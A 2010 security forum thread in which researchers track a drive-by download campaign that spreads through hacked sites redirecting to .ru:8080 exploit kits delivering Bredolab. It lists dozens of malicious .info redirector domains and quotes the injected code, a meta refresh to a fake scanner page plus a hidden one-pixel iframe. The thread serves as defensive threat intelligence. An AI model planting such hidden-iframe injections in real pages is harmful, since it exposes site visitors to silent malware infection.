There are a substantial amount of people hitting these drive by kits and they are all exclusively driven by compromised sites. So it seems to be all part of a campaign run by a crew based on that vector. They are also rotating domain names for the drive by sites constantly along with the intermediary sites they redirect through (hacked site -> *.ru:80 domain redirect -> *.ru:8080 domain drive by). Payload also exclusively seems to be bredolab from the samples I have picked up in the wild. I go through a step by step process write up on this over here:

http://trojanedbinaries.com/blog/?p=188


August 14, 2010, 03:49:37 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Cheers :)

I'm not online much today (birthday :(), but will get to finding specifics as soon as I can :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 14, 2010, 05:22:39 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Cheers :)

I'm not online much today (birthday :(), but will get to finding specifics as soon as I can :)

Happy Birthday !
Ruining the bad guy's day

August 14, 2010, 08:01:38 pm
Reply #5

cleanmx

  • Special Members
  • Hero Member

  • Offline
  • *

  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
happy Birthday from me too !

-- gerhard

August 15, 2010, 04:32:44 pm
Reply #6

cleanmx

  • Special Members
  • Hero Member

  • Offline
  • *

  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
all these are leading to .ru:8080 in hidden iframe...

Code: [Select]
http://adzpoyhf.info/
http://ahvqmytl.info/
http://anhrejws.info/
http://avbcnetp.info/
http://bdinjfvv.info/
http://bdizstir.info/
http://besniwjf.info/
http://blzhgglu.info/
http://buqgxhty.info/
http://cblvuotv.info/
http://cfegiwtc.info/
http://cqqnfxzc.info/
http://crtdkcyi.info/
http://cvwlpnmo.info/
http://dbmtkhye.info/
http://d-maniax.info/
http://dwldaodz.info/
http://egsznblw.info/
http://ejntngjz.info/
http://galyzvua.info/
http://gsljrnsq.info/
http://gstsjrxj.info/
http://hame-ko.info/
http://hbsejsln.info/
http://hdywtehx.info/
http://hmlbnmpc.info/
http://hqfkiwld.info/
http://jlelcivt.info/
http://kirbvxyg.info/
http://kitbrlju.info/
http://kpfrhffa.info/
http://ljjrwmne.info/
http://mnnvxkdh.info/
http://msicdvew.info/
http://mywkwvob.info/
http://nfgkiprm.info/
http://nfuzuzdp.info/
http://nkyfthtn.info/
http://nsnvljga.info/
http://ojiyvojb.info/
http://opebqbyi.info/
http://oyqrdnkt.info/
http://plkmbvsn.info/
http://qabblyvc.info/
http://qcqdscqy.info/
http://qhztxgly.info/
http://qoyxpbhl.info/
http://qqlngtw.info/
http://rbbzjijd.info/
http://rkxnglit.info/
http://rqhlimip.info/
http://rwcntnwb.info/
http://sjwjyspv.info/
http://spniqbry.info/
http://tfdwpjfb.info/
http://tswdbjlp.info/
http://ulvxivhh.info/
http://uovxhvsa.info/
http://uyiwuklk.info/
http://vitvywkw.info/
http://vshdpqdp.info/
http://vszncaov.info/
http://xdtlnpbz.info/
http://xdwcyjqx.info/
http://ywfrjzwr.info/
http://ywirqtyh.info/
http://ywqfnids.info/

typically this code will be presented...

Code: [Select]
PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=http://rametcori.cz.cc/scanner15/?afid=24">
</head><body>

<iframe src="http://workray.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>



-- gerhard

August 16, 2010, 08:40:00 pm
Reply #7

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
FYI: http://isc.sans.edu/diary.html?date=2010-08-15

Apparently a pretty big SQL injection campaign that tossed this stuff into a bunch of sites.